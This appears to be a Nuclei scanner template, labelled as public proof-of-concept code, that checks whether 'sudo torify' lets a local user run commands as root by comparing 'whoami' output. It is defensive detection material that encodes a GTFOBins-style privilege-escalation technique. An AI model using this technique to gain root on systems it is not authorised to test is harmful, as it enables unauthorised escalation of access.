torify is a command-line utility that is used to transparently route network traffic through the Tor network. It is commonly used to anonymize the network connections of other command-line programs, allowing them to communicate over the Tor network for enhanced privacy and security.
PoC代码[已公开]
id: privesc-torify
info:
name: Torify - Privilege Escalation
author: daffainfo
severity: high
description: |
torify is a command-line utility that is used to transparently route network traffic through the Tor network. It is commonly used to anonymize the network connections of other command-line programs, allowing them to communicate over the Tor network for enhanced privacy and security.
reference:
- https://gtfobins.github.io/gtfobins/torify/
metadata:
verified: true
max-request: 3
tags: code,linux,torify,privesc,local
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
- engine:
- sh
- bash
source: |
torify whoami
- engine:
- sh
- bash
source: |
sudo torify whoami
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or
# digest: 4a0a00473045022058d52998ed3d4349910adb977ee99f5313aa81d095c6bcb6239cdc6a9398396d022100ed8e456183be3aba802002e63490e0fd13552c63afd744573f4d52d152f9416c:922c64590222798bb761d5b6d8e72950